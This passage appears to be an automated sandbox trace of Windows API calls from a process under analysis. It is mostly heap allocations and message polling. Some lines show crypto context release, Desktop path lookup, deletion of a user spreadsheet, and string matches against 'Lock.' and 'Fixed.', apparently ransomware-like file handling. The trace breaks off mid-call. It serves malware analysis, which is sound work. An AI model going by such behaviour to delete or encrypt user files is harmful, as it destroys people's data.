[0090.763] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.763] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.763] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.763] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0090.763] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0090.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0090.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.764] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0090.764] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.764] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.764] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0090.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6fa0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0090.764] CryptReleaseContext (hProv=0x9961a8, dwFlags=0x0) returned 1 [0090.764] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.764] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.764] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.764] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.764] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.764] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.764] FreeLibrary (hLibModule=0x76390000) returned 1 [0090.764] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.764] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.765] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.765] CloseHandle (hObject=0x2c4) returned 1 [0090.765] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.765] CloseHandle (hObject=0x294) returned 1 [0090.817] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.818] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.818] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0090.818] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0090.818] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/eacUdxJuUDfuA061.xls", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\eacUdxJuUDfuA061.xls", lpFilePart=0x8cedf4*="eacUdxJuUDfuA061.xls") returned 0x2c [0090.818] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\eacUdxJuUDfuA061.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\eacudxjuudfua061.xls")) returned 0x20 [0090.818] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\eacUdxJuUDfuA061.xls", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67baf930, ftCreationTime.dwHighDateTime=0x1d5d160, ftLastAccessTime.dwLowDateTime=0xc1284a30, ftLastAccessTime.dwHighDateTime=0x1d5d382, ftLastWriteTime.dwLowDateTime=0xc1284a30, ftLastWriteTime.dwHighDateTime=0x1d5d382, nFileSizeHigh=0x0, nFileSizeLow=0x13ea7, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="eacUdxJuUDfuA061.xls", cAlternateFileName="EACUDX~1.XLS")) returned 0x9a4040 [0090.819] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\eacUdxJuUDfuA061.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\eacudxjuudfua061.xls")) returned 1 [0090.825] FindNextFileW (in: hFindFile=0x9a4040, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67baf930, ftCreationTime.dwHighDateTime=0x1d5d160, ftLastAccessTime.dwLowDateTime=0xc1284a30, ftLastAccessTime.dwHighDateTime=0x1d5d382, ftLastWriteTime.dwLowDateTime=0xc1284a30, ftLastWriteTime.dwHighDateTime=0x1d5d382, nFileSizeHigh=0x0, nFileSizeLow=0x13ea7, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="eacUdxJuUDfuA061.xls", cAlternateFileName="EACUDX~1.XLS")) returned 0 [0090.825] FindClose (in: hFindFile=0x9a4040 | out: hFindFile=0x9a4040) returned 1 [0090.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75ee8 | out: hHeap=0x2af0000) returned 1 [0090.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0090.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0090.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0090.825] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0090.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0090.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0090.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0090.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0090.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0090.826] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0090.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0090.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0090.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0090.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0090.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0090.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0090.826] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0090.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0090.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6568 [0090.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0090.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0090.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0090.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0090.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0090.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0090.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0090.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0090.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0090.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0090.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0090.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a751c8 [0090.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6568 | out: hHeap=0x2af0000) returned 1 [0090.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0090.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0090.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0090.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0090.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0090.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0090.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0090.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0090.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0090.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0090.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0090.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0090.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0090.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0090.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0090.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0090.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5a) returned 0x2a68440 [0090.827] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/eacUdxJuUDfuA061.xls", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\eacUdxJuUDfuA061.xls", lpFilePart=0x8cf650*="eacUdxJuUDfuA061.xls") returned 0x2c [0090.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0090.827] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\eacUdxJuUDfuA061.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\eacudxjuudfua061.xls")) returned 0xffffffff [0090.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a751c8 | out: hHeap=0x2af0000) returned 1 [0090.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0090.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0090.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0090.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.828] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0090.828] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.828] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0090.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0090.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0090.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0090.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0090.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0090.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0090.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0090.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0090.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0090.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0090.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ED 0nXQ VIkUvYr6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D 0nXQ VIkUvYr6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 0nXQ VIkUvYr6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0nXQ VIkUvYr6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nXQ VIkUvYr6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0090.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XQ VIkUvYr6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0090.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q VIkUvYr6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0090.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" VIkUvYr6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VIkUvYr6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0090.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IkUvYr6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kUvYr6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UvYr6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0090.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0090.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0090.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0090.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0090.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0090.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0090.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0090.829] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0090.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0090.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0090.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0090.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0090.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0090.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0090.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0090.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0090.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0090.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0090.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0090.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0090.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0090.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x22) returned 0x2a69a90 [0090.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0090.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ED 0nXQ VIkUvYr6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D 0nXQ VIkUvYr6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 0nXQ VIkUvYr6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0nXQ VIkUvYr6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nXQ VIkUvYr6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XQ VIkUvYr6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q VIkUvYr6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" VIkUvYr6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VIkUvYr6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IkUvYr6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kUvYr6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa65d8 [0090.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa65d8 | out: hHeap=0x2af0000) returned 1 [0090.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0090.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0090.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0090.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0090.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0090.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0090.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0090.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0090.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa61e8 | out: hHeap=0x2af0000) returned 1 [0090.844] HeapFree (in: hHeap=0x2af0000, 